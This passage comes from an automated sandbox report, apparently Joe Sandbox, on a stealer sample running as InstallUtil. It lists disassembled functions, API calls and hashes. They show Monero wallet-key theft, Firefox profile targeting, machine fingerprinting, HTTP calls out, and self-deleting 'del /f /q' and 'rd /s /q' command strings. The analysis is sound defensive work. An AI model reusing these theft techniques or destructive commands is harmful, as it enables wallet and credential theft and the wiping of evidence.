                                                                                                                    • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                    • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                    • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                  • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2891980384-0
                                                                                                                  • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                  • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                                  • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                  • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                                  Function 00411203 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                  • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                  • wsprintfA.USER32 ref: 004112DD
                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00411466
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                  • String ID: - $%s\%s$?
                                                                                                                  • API String ID: 2394436309-3278919252
                                                                                                                  • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                  • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                                  • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                  • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                                  Function 00418271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00418296
                                                                                                                  • _memset.LIBCMT ref: 004182A5
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 00418456
                                                                                                                  • _memset.LIBCMT ref: 00418465
                                                                                                                  • _memset.LIBCMT ref: 00418477
                                                                                                                  • ExitProcess.KERNEL32 ref: 00418487
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  Strings
                                                                                                                  • /c timeout /t 10 & del /f /q ", xrefs: 004182E5
                                                                                                                  • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
                                                                                                                  • " & rd /s /q "C:\ProgramData\, xrefs: 00418333
                                                                                                                  • " & exit, xrefs: 00418389
                                                                                                                  • " & exit, xrefs: 004183DA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                  • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                  • API String ID: 2823247455-1079830800
                                                                                                                  • Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                  • Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
                                                                                                                  • Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                  • Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58
                                                                                                                  Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                  • wsprintfA.USER32 ref: 00410AA7
                                                                                                                  • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                    • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                    • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                    • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                    • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                    • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                    • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                  • String ID: wA$:\$C$QuBi
                                                                                                                  • API String ID: 1856320939-1441494722
                                                                                                                  • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                  • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                                  • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                  • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                                  Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                    • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                    • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                    • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                    • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                    • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                    • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                    • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                  • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                  • API String ID: 4174444224-1526165396
                                                                                                                  • Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                  • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                                  • Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                  • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                                  Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy
                                                                                                                  • String ID: Stable\$ Stable\$firefox
                                                                                                                  • API String ID: 3722407311-2697854757
                                                                                                                  • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                  • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                                  • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                  • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                                  Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00401ADC
                                                                                                                    • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                    • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                    • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                    • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                    • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                  • String ID: .keys$\Monero\wallet.keys
                                                                                                                  • API String ID: 615783205-3586502688
                                                                                                                  • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                  • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                                  • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                  • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                                  Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                    • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
